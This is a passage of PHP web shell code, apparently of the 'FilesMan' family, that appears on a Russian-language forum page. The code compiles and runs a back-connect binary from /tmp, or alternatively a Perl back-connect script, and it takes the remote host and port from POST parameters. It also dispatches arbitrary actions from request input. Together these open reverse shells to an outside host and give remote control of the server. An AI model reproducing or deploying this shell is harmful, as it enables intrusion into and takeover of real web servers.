$▖ = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$▖ .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
echo "
$▖".ex("ps aux | grep bc")."
";
}
if($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl",$back_connect_p);
$▖ = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
echo "
$▖".ex("ps aux | grep bc.pl")."
";
}
}
echo '
';
hardFooter();
}
if( empty($_POST['a']) )
if(isset($▚) && function_exists('action' . $▚))
$_POST['a'] = $▚;
else
$_POST['a'] = 'FilesMan';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a']);
?>
от 09.01.2024 15:01
Авторизуйтесь для ответа в теме

Оформить подписку

Будьте в курсе наших акций и спецпредложений!